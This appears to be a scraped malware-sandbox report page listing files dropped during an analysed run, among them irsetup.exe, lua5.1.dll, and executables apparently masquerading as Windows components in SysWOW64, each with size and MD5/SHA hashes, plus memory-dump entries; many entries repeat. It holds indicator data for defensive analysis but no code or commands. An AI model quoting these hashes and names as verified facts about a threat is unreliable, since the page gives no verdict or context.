ffc97976471e26e938e0389b33c0143b4a55653f90ee35f8220663b2a78fc48a106a204dd25c990817a57f3670d41fd1361cbdbc3bc4894ded882b356649c083

Download Submit
C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

Filesize
350KB

MD5
c916c7815286c5233a49deac81f8543e

SHA1
cb964c3c8eae8e7ce170f3ad3a55993f7a1918db

SHA256
3d07466b8f5c18afc70c6a9746d43fa7daa39c9bd41e8bfb928c70e7d7458bf4

SHA512
0d65283c41c30ee688bf02ec3eec7f6b17a750efc18fa6a66f26c7c6ef8bae860d270b31017f096d8d254c2769be2b7ed64d6b3dc659d1b57d466388271e2c78

Download Submit
C:\Users\Admin\AppData\Local\Temp\mscorp.crt

Filesize
1KB

MD5
e28ab9a531726b9464d9a4773d127fa8

SHA1
cb12b4235853d06293e3eac9ba157a7e919618d1

SHA256
55321dcd921a9b1b2f7e823c46c11730413dccb5c1757ef1cb443e929a565b93

SHA512
e30cb3b03f7b27a8cd5afe8c431796d48feaa75eb410396f0f70ec7d7f24abfd540a9c16e8fa7a1e5c51f571185b338516f9b008fc73a5ea72a2dc9d4826e265

Download Submit
C:\Users\Admin\AppData\Local\Temp\mscorp.crt

Filesize
1KB

MD5
e28ab9a531726b9464d9a4773d127fa8

SHA1
cb12b4235853d06293e3eac9ba157a7e919618d1

SHA256
55321dcd921a9b1b2f7e823c46c11730413dccb5c1757ef1cb443e929a565b93

SHA512
e30cb3b03f7b27a8cd5afe8c431796d48feaa75eb410396f0f70ec7d7f24abfd540a9c16e8fa7a1e5c51f571185b338516f9b008fc73a5ea72a2dc9d4826e265

Download Submit
C:\Windows\SysWOW64\CompatTelRunner.exe

Filesize
13.4MB

MD5
b37c71b034a5d9b4bb1e6fde1d4e9f13

SHA1
87b950511c00f594862a57fdee8b332f59925231

SHA256
315103fbffde78cdad96a27dad35b72b409b055fd6e1ad1fc871c12797511158

SHA512
964316a329f75cd8988035254bf274dc01aa5027a25a5ae61917edb79bb0abf0c47eb60a70b47b5837e6936c2eb710d976859040b5d7c442676fdfd236cbaf17

Download Submit
C:\Windows\SysWOW64\CompatTelRunner.exe

Filesize
13.4MB

MD5
b37c71b034a5d9b4bb1e6fde1d4e9f13

SHA1
87b950511c00f594862a57fdee8b332f59925231

SHA256
315103fbffde78cdad96a27dad35b72b409b055fd6e1ad1fc871c12797511158

SHA512
964316a329f75cd8988035254bf274dc01aa5027a25a5ae61917edb79bb0abf0c47eb60a70b47b5837e6936c2eb710d976859040b5d7c442676fdfd236cbaf17

Download Submit
C:\Windows\SysWOW64\CompatTelRunner.exe

Filesize
13.4MB

MD5
b37c71b034a5d9b4bb1e6fde1d4e9f13

SHA1
87b950511c00f594862a57fdee8b332f59925231

SHA256
315103fbffde78cdad96a27dad35b72b409b055fd6e1ad1fc871c12797511158

SHA512
964316a329f75cd8988035254bf274dc01aa5027a25a5ae61917edb79bb0abf0c47eb60a70b47b5837e6936c2eb710d976859040b5d7c442676fdfd236cbaf17

Download Submit
C:\Windows\SysWOW64\MicrosoftWindowsold.xml

Filesize
4KB

MD5
d72d0678e1b82b5fd0f8f68314a5369f

SHA1
e8e27641a152bb14318a29b059f8d2c095199ced

SHA256
a705ba2707c6b47cf06c3f13b3cf6425e283f3247a0dc27b79fc00ad12f631a5

SHA512
4e9a5b98ae2c77d84ef649f10efb78a305960da34b787ad44fae489927a42f4744aed0ed52205c7f074d575409ad4d85e87c9f29408af22fcb751964875fd63c

Download Submit
C:\Windows\SysWOW64\MicrosoftWindowsold.xml

Filesize
4KB

MD5
d72d0678e1b82b5fd0f8f68314a5369f

SHA1
e8e27641a152bb14318a29b059f8d2c095199ced

SHA256
a705ba2707c6b47cf06c3f13b3cf6425e283f3247a0dc27b79fc00ad12f631a5

SHA512
4e9a5b98ae2c77d84ef649f10efb78a305960da34b787ad44fae489927a42f4744aed0ed52205c7f074d575409ad4d85e87c9f29408af22fcb751964875fd63c

Download Submit
C:\Windows\SysWOW64\WindowsUpdateBox.exe

Filesize
11.7MB

MD5
0402b64d6de5d4c2f6ecd09b78714a2c

SHA1
af2af7868dfe5515ef5d80d1b069ea22d3e767fb

SHA256
5335a9dabdb798113c574031b021e8ea0fff9e45d1f1f83f255371820c07f86e

SHA512
2db83bb2ec5fb0a923fc7846f1fa5d9ad6fd06fa162e33aa0f2dd30ff2f92d6ff6be036b17f1bebcbf5f79843bf799668737d041d114315e129dd50e2685df2c

Download Submit
C:\Windows\SysWOW64\WindowsUpdateBox.exe

Filesize
11.7MB

MD5
0402b64d6de5d4c2f6ecd09b78714a2c

SHA1
af2af7868dfe5515ef5d80d1b069ea22d3e767fb

SHA256
5335a9dabdb798113c574031b021e8ea0fff9e45d1f1f83f255371820c07f86e

SHA512
2db83bb2ec5fb0a923fc7846f1fa5d9ad6fd06fa162e33aa0f2dd30ff2f92d6ff6be036b17f1bebcbf5f79843bf799668737d041d114315e129dd50e2685df2c

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Filesize
4.9MB

MD5
b0a1f1e0a106e1a62753c8a07fb3809b

SHA1
b4bab82aa173a401a2f16f8b4ad91105a895b2d9

SHA256
f7e07f7936269756bb73e91c8b280c2ab8532fb5bf15085d96eaebc7a05a8950

SHA512
ffc97976471e26e938e0389b33c0143b4a55653f90ee35f8220663b2a78fc48a106a204dd25c990817a57f3670d41fd1361cbdbc3bc4894ded882b356649c083

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Filesize
4.9MB

MD5
b0a1f1e0a106e1a62753c8a07fb3809b

SHA1
b4bab82aa173a401a2f16f8b4ad91105a895b2d9

SHA256
f7e07f7936269756bb73e91c8b280c2ab8532fb5bf15085d96eaebc7a05a8950

SHA512
ffc97976471e26e938e0389b33c0143b4a55653f90ee35f8220663b2a78fc48a106a204dd25c990817a57f3670d41fd1361cbdbc3bc4894ded882b356649c083

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

Filesize
350KB

MD5
c916c7815286c5233a49deac81f8543e

SHA1
cb964c3c8eae8e7ce170f3ad3a55993f7a1918db

SHA256
3d07466b8f5c18afc70c6a9746d43fa7daa39c9bd41e8bfb928c70e7d7458bf4

SHA512
0d65283c41c30ee688bf02ec3eec7f6b17a750efc18fa6a66f26c7c6ef8bae860d270b31017f096d8d254c2769be2b7ed64d6b3dc659d1b57d466388271e2c78

Download Submit
\Windows\SysWOW64\CompatTelRunner.exe

Filesize
13.4MB

MD5
b37c71b034a5d9b4bb1e6fde1d4e9f13

SHA1
87b950511c00f594862a57fdee8b332f59925231

SHA256
315103fbffde78cdad96a27dad35b72b409b055fd6e1ad1fc871c12797511158

SHA512
964316a329f75cd8988035254bf274dc01aa5027a25a5ae61917edb79bb0abf0c47eb60a70b47b5837e6936c2eb710d976859040b5d7c442676fdfd236cbaf17

Download Submit
\Windows\SysWOW64\WindowsUpdateBox.exe

Filesize
11.7MB

MD5
0402b64d6de5d4c2f6ecd09b78714a2c

SHA1
af2af7868dfe5515ef5d80d1b069ea22d3e767fb

SHA256
5335a9dabdb798113c574031b021e8ea0fff9e45d1f1f83f255371820c07f86e

SHA512
2db83bb2ec5fb0a923fc7846f1fa5d9ad6fd06fa162e33aa0f2dd30ff2f92d6ff6be036b17f1bebcbf5f79843bf799668737d041d114315e129dd50e2685df2c

Download Submit
\Windows\SysWOW64\WindowsUpdateBox.exe

Filesize
11.7MB

MD5
0402b64d6de5d4c2f6ecd09b78714a2c

SHA1
af2af7868dfe5515ef5d80d1b069ea22d3e767fb

SHA256
5335a9dabdb798113c574031b021e8ea0fff9e45d1f1f83f255371820c07f86e

SHA512
2db83bb2ec5fb0a923fc7846f1fa5d9ad6fd06fa162e33aa0f2dd30ff2f92d6ff6be036b17f1bebcbf5f79843bf799668737d041d114315e129dd50e2685df2c

Download Submit
\Windows\SysWOW64\WindowsUpdateBox.exe

Filesize
11.7MB

MD5
0402b64d6de5d4c2f6ecd09b78714a2c

SHA1
af2af7868dfe5515ef5d80d1b069ea22d3e767fb

SHA256
5335a9dabdb798113c574031b021e8ea0fff9e45d1f1f83f255371820c07f86e

SHA512
2db83bb2ec5fb0a923fc7846f1fa5d9ad6fd06fa162e33aa0f2dd30ff2f92d6ff6be036b17f1bebcbf5f79843bf799668737d041d114315e129dd50e2685df2c

Download Submit
memory/848-54-0x000007FEFBC51000-0x000007FEFBC53000-memory.dmp

Filesize
8KB

Download
memory/948-99-0x0000000140000000-0x0000000141087000-memory.dmp

Filesize
16.5MB

Download
memory/1368-102-0x00000000FFF01000-0x00000000FFF03000-memory.dmp

Filesize
8KB

Download
memory/1884-75-0x00000000FFA21000-0x00000000FFA23000-memory.dmp

Filesize
8KB

Download
memory/1980-88-0x0000000140000000-0x0000000141087000-memory.dmp

Filesize
16.5MB

Download
memory/1980-87-0x00000000002F0000-0x0000000000310000-memory.dmp

Filesize
128KB

Download
memory/1980-86-0x0000000140000000-0x0000000141087000-memory.dmp

Filesize
16.5MB

Download